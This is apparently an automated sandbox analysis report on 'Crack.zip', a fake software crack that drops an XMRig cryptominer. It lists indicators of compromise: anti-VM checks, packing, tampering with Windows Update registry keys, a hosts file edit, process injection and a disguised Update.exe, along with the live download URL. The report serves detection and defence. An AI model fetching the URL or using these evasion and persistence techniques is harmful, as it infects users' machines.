xmrig | hxxps://github[.]com/crack-watch/files/releases/download/ca/Crack[.]zip

Analysis

max time kernel
150s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
17-03-2023 10:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/crack-watch/files/releases/download/ca/Crack.zip

Score

10^/10

xmrig evasion miner themida trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs

Processes:

Crack.exeUpdate.execonhost.exeCrack.exe

description	pid	process	target process
PID 3616 created 664	3616	Crack.exe	Explorer.EXE
PID 3616 created 664	3616	Crack.exe	Explorer.EXE
PID 3616 created 664	3616	Crack.exe	Explorer.EXE
PID 3616 created 664	3616	Crack.exe	Explorer.EXE
PID 3616 created 664	3616	Crack.exe	Explorer.EXE
PID 3604 created 664	3604	Update.exe	Explorer.EXE
PID 3604 created 664	3604	Update.exe	Explorer.EXE
PID 3604 created 664	3604	Update.exe	Explorer.EXE
PID 3604 created 664	3604	Update.exe	Explorer.EXE
PID 3604 created 664	3604	Update.exe	Explorer.EXE
PID 4944 created 664	4944	conhost.exe	Explorer.EXE
PID 3604 created 664	3604	Update.exe	Explorer.EXE
PID 2192 created 664	2192	Crack.exe	Explorer.EXE
PID 2192 created 664	2192	Crack.exe	Explorer.EXE
PID 2192 created 664	2192	Crack.exe	Explorer.EXE
PID 2192 created 664	2192	Crack.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

Crack.exeUpdate.exeCrack.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Crack.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Crack.exe

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2408-295-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	xmrig
behavioral1/memory/2408-296-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	xmrig
behavioral1/memory/2408-298-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	xmrig
behavioral1/memory/2408-304-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	xmrig
behavioral1/memory/2408-308-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	xmrig
behavioral1/memory/2408-312-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	xmrig

Drops file in Drivers directory 3 IoCs

Processes:

Crack.exeUpdate.exeCrack.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	Crack.exe
File created	C:\Windows\System32\drivers\etc\hosts	Update.exe
File created	C:\Windows\System32\drivers\etc\hosts	Crack.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Crack.exeCrack.exeUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Crack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Crack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Crack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Crack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Update.exe

Executes dropped EXE 1 IoCs

Processes:

Update.exe

pid process

3604 Update.exe

pid	process
3604	Update.exe

Themida packer 21 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/3616-151-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp	themida
behavioral1/memory/3616-152-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp	themida
behavioral1/memory/3616-153-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp	themida
behavioral1/memory/3616-154-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp	themida
behavioral1/memory/3616-155-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp	themida
behavioral1/memory/3616-187-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp	themida
behavioral1/memory/3616-193-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp	themida
C:\Program Files\ChromeUpdate\Update.exe	themida
behavioral1/memory/3604-209-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp	themida
behavioral1/memory/3604-210-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp	themida
behavioral1/memory/3604-211-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp	themida
behavioral1/memory/3604-212-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp	themida
behavioral1/memory/3604-223-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp	themida
behavioral1/memory/3604-248-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp	themida
C:\Program Files\ChromeUpdate\Update.exe	themida
behavioral1/memory/3604-292-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp	themida
behavioral1/memory/2192-299-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp	themida
behavioral1/memory/2192-300-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp	themida
behavioral1/memory/2192-301-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp	themida
behavioral1/memory/2192-302-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp	themida
behavioral1/memory/2192-306-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp	themida

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2408-290-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	upx
behavioral1/memory/2408-295-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	upx
behavioral1/memory/2408-296-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	upx
behavioral1/memory/2408-298-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	upx
behavioral1/memory/2408-304-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	upx
behavioral1/memory/2408-308-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	upx
behavioral1/memory/2408-312-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Update.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Update.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Update.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

Crack.exeUpdate.exeCrack.exe

pid process

3616 Crack.exe
3604 Update.exe
2192 Crack.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Update.exe

description	pid	process	target process
PID 3604 set thread context of 4944	3604	Update.exe	conhost.exe
PID 3604 set thread context of 2408	3604	Update.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

cmd.exeCrack.exeUpdate.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\ChromeUpdate\Update.exe	Crack.exe
File created	C:\Program Files\Google\Libs\WR64.sys	Update.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
3292	sc.exe
1768	sc.exe
4916	sc.exe
4284	sc.exe
1424	sc.exe
180	sc.exe
2740	sc.exe
3484	sc.exe
5080	sc.exe
1512	sc.exe
4492	sc.exe
5036	sc.exe
3756	sc.exe
3484	sc.exe
2300	sc.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = d3273793ae45d901	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 29 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{18F39858-8E46-4D57-97A8-2B28041FA364}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31021255"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3292743203"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31021255"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{EF5E2C87-C4BA-11ED-9F77-62080863D4B5} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "385819243"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3292743203"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe

Modifies registry class 1 IoCs

Processes:

iexplore.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Crack.exepowershell.exepowershell.exepowershell.exeUpdate.exepowershell.exepowershell.execonhost.execonhost.exe

pid	process
3616	Crack.exe
3616	Crack.exe
708	powershell.exe
708	powershell.exe
3616	Crack.exe
3616	Crack.exe
3616	Crack.exe
3616	Crack.exe
3616	Crack.exe
3616	Crack.exe
5068	powershell.exe
5068	powershell.exe
5068	powershell.exe
3616	Crack.exe
3616	Crack.exe
5064	powershell.exe
5064	powershell.exe
3604	Update.exe
3604	Update.exe
3420	powershell.exe
3420	powershell.exe
3604	Update.exe
3604	Update.exe
3604	Update.exe
3604	Update.exe
3604	Update.exe
3604	Update.exe
3292	powershell.exe
3292	powershell.exe
3604	Update.exe
3604	Update.exe
3604	Update.exe
3604	Update.exe
4944	conhost.exe
4944	conhost.exe
3604	Update.exe
3604	Update.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe
2408	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656

pid	process
656

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	708	powershell.exe
Token: SeShutdownPrivilege	3644	powercfg.exe
Token: SeCreatePagefilePrivilege	3644	powercfg.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeShutdownPrivilege	4880	powercfg.exe
Token: SeCreatePagefilePrivilege	4880	powercfg.exe
Token: SeShutdownPrivilege	3532	powercfg.exe
Token: SeCreatePagefilePrivilege	3532	powercfg.exe
Token: SeShutdownPrivilege	1920	powercfg.exe
Token: SeCreatePagefilePrivilege	1920	powercfg.exe
Token: SeIncreaseQuotaPrivilege	5068	powershell.exe
Token: SeSecurityPrivilege	5068	powershell.exe
Token: SeTakeOwnershipPrivilege	5068	powershell.exe
Token: SeLoadDriverPrivilege	5068	powershell.exe
Token: SeSystemProfilePrivilege	5068	powershell.exe
Token: SeSystemtimePrivilege	5068	powershell.exe
Token: SeProfSingleProcessPrivilege	5068	powershell.exe
Token: SeIncBasePriorityPrivilege	5068	powershell.exe
Token: SeCreatePagefilePrivilege	5068	powershell.exe
Token: SeBackupPrivilege	5068	powershell.exe
Token: SeRestorePrivilege	5068	powershell.exe
Token: SeShutdownPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeSystemEnvironmentPrivilege	5068	powershell.exe
Token: SeRemoteShutdownPrivilege	5068	powershell.exe
Token: SeUndockPrivilege	5068	powershell.exe
Token: SeManageVolumePrivilege	5068	powershell.exe
Token: 33	5068	powershell.exe
Token: 34	5068	powershell.exe
Token: 35	5068	powershell.exe
Token: 36	5068	powershell.exe
Token: SeIncreaseQuotaPrivilege	5068	powershell.exe
Token: SeSecurityPrivilege	5068	powershell.exe
Token: SeTakeOwnershipPrivilege	5068	powershell.exe
Token: SeLoadDriverPrivilege	5068	powershell.exe
Token: SeSystemProfilePrivilege	5068	powershell.exe
Token: SeSystemtimePrivilege	5068	powershell.exe
Token: SeProfSingleProcessPrivilege	5068	powershell.exe
Token: SeIncBasePriorityPrivilege	5068	powershell.exe
Token: SeCreatePagefilePrivilege	5068	powershell.exe
Token: SeBackupPrivilege	5068	powershell.exe
Token: SeRestorePrivilege	5068	powershell.exe
Token: SeShutdownPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeSystemEnvironmentPrivilege	5068	powershell.exe
Token: SeRemoteShutdownPrivilege	5068	powershell.exe
Token: SeUndockPrivilege	5068	powershell.exe
Token: SeManageVolumePrivilege	5068	powershell.exe
Token: 33	5068	powershell.exe
Token: 34	5068	powershell.exe
Token: 35	5068	powershell.exe
Token: 36	5068	powershell.exe
Token: SeIncreaseQuotaPrivilege	5068	powershell.exe
Token: SeSecurityPrivilege	5068	powershell.exe
Token: SeTakeOwnershipPrivilege	5068	powershell.exe
Token: SeLoadDriverPrivilege	5068	powershell.exe
Token: SeSystemProfilePrivilege	5068	powershell.exe
Token: SeSystemtimePrivilege	5068	powershell.exe
Token: SeProfSingleProcessPrivilege	5068	powershell.exe
Token: SeIncBasePriorityPrivilege	5068	powershell.exe
Token: SeCreatePagefilePrivilege	5068	powershell.exe
Token: SeBackupPrivilege	5068	powershell.exe
Token: SeRestorePrivilege	5068	powershell.exe
Token: SeShutdownPrivilege	5068	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

940 iexplore.exe
940 iexplore.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

940 iexplore.exe
940 iexplore.exe
2448 IEXPLORE.EXE
2448 IEXPLORE.EXE

pid	process
940	iexplore.exe
940	iexplore.exe

pid	process
940	iexplore.exe
940	iexplore.exe
2448	IEXPLORE.EXE
2448	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.execmd.execmd.exepowershell.execmd.execmd.exeUpdate.execmd.exe

description	pid	process	target process
PID 940 wrote to memory of 2448	940	iexplore.exe	IEXPLORE.EXE
PID 940 wrote to memory of 2448	940	iexplore.exe	IEXPLORE.EXE
PID 940 wrote to memory of 2448	940	iexplore.exe	IEXPLORE.EXE
PID 392 wrote to memory of 180	392	cmd.exe	sc.exe
PID 392 wrote to memory of 180	392	cmd.exe	sc.exe
PID 736 wrote to memory of 3644	736	cmd.exe	powercfg.exe
PID 736 wrote to memory of 3644	736	cmd.exe	powercfg.exe
PID 736 wrote to memory of 4880	736	cmd.exe	powercfg.exe
PID 736 wrote to memory of 4880	736	cmd.exe	powercfg.exe
